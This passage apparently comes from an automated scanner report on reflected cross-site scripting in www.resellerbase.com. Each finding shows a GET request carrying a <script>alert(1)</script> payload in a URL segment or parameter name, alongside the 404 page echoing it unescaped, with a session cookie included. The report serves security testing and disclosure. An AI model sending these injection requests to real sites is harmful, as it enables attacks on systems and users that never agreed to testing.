The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 27e50<script>alert(1)</script>2aaa840d106 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images27e50<script>alert(1)</script>2aaa840d106/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images27e50<script>alert(1)</script>2aaa840d106/ was not found on this server.</p>
...[SNIP]...

2.614. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f2b1f<script>alert(1)</script>2add2188c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/?f2b1f<script>alert(1)</script>2add2188c0=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/?f2b1f<script>alert(1)</script>2add2188c0=1 was not found on this server.</p>
...[SNIP]...

2.615. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 30b7f<script>alert(1)</script>ea0f6779b36 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication30b7f<script>alert(1)</script>ea0f6779b36/mobile-content/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication30b7f<script>alert(1)</script>ea0f6779b36/mobile-content/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.616. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 585ed<script>alert(1)</script>ec319b26f71 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content585ed<script>alert(1)</script>ec319b26f71/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content585ed<script>alert(1)</script>ec319b26f71/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.617. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 348f2<script>alert(1)</script>601343c2571 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes348f2<script>alert(1)</script>601343c2571/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes348f2<script>alert(1)</script>601343c2571/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.618. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b4fd9<script>alert(1)</script>beae84c0d64 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmosb4fd9<script>alert(1)</script>beae84c0d64/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmosb4fd9<script>alert(1)</script>beae84c0d64/images/rating/ was not found on this server.</p>
...[SNIP]...

2.619. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c88c3<script>alert(1)</script>05eb52630bc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/imagesc88c3<script>alert(1)</script>05eb52630bc/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/imagesc88c3<script>alert(1)</script>05eb52630bc/rating/ was not found on this server.</p>
...[SNIP]...

2.620. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 595bf<script>alert(1)</script>8546207e525 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/rating595bf<script>alert(1)</script>8546207e525/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/rating595bf<script>alert(1)</script>8546207e525/ was not found on this server.</p>
...[SNIP]...

2.621. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6ec23<script>alert(1)</script>56ea3d98f37 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/rating/?6ec23<script>alert(1)</script>56ea3d98f37=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/rating/?6ec23<script>alert(1)</script>56ea3d98f37=1 was not found on this server.</p>
...[SNIP]...

2.622. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/4.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ab4db<script>alert(1)</script>199bb651eef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicationab4db<script>alert(1)</script>199bb651eef/mobile-content/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicationab4db<script>alert(1)</script>199bb651eef/mobile-content/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.623. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/4.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e6de8<script>alert(1)</script>aabc3f61c23 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-contente6de8<script>alert(1)</script>aabc3f61c23/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-contente6de8<script>alert(1)</script>aabc3f61c23/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.624. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/4.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 38036<script>alert(1)</script>862e09e44a5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes38036<script>alert(1)</script>862e09e44a5/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes38036<script>alert(1)</script>862e09e44a5/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.625. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/4.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5d612<script>alert(1)</script>a9471a61056 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos5d612<script>alert(1)</script>a9471a61056/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos5d612<script>alert(1)</script>a9471a61056/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.626. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/4.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ecc65<script>alert(1)</script>5c85fd81536 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/imagesecc65<script>alert(1)</script>5c85fd81536/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/imagesecc65<script>alert(1)</script>5c85fd81536/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.627. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/4.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 7324c<script>alert(1)</script>43ab631fec3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/rating7324c<script>alert(1)</script>43ab631fec3/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/rating7324c<script>alert(1)</script>43ab631fec3/4.gif was not found on this server.</p>
...[SNIP]...

2.628. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/4.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload d45d6<script>alert(1)</script>3d27a27abe was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/rating/4.gifd45d6<script>alert(1)</script>3d27a27abe HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/rating/4.gifd45d6<script>alert(1)</script>3d27a27abe was not found on this server.</p>
...[SNIP]...

2.629. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/4.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/rating/4.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 301df<script>alert(1)</script>168e251d198 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/rating/4.gif?301df<script>alert(1)</script>168e251d198=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/rating/4.gif?301df<script>alert(1)</script>168e251d198=1 was not found on this server.</p>
...[SNIP]...

2.630. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8ec0b<script>alert(1)</script>1a179ed5534 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication8ec0b<script>alert(1)</script>1a179ed5534/mobile-content/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication8ec0b<script>alert(1)</script>1a179ed5534/mobile-content/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.631. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b94cc<script>alert(1)</script>1db34878577 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-contentb94cc<script>alert(1)</script>1db34878577/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-contentb94cc<script>alert(1)</script>1db34878577/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.632. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/rating/search.php

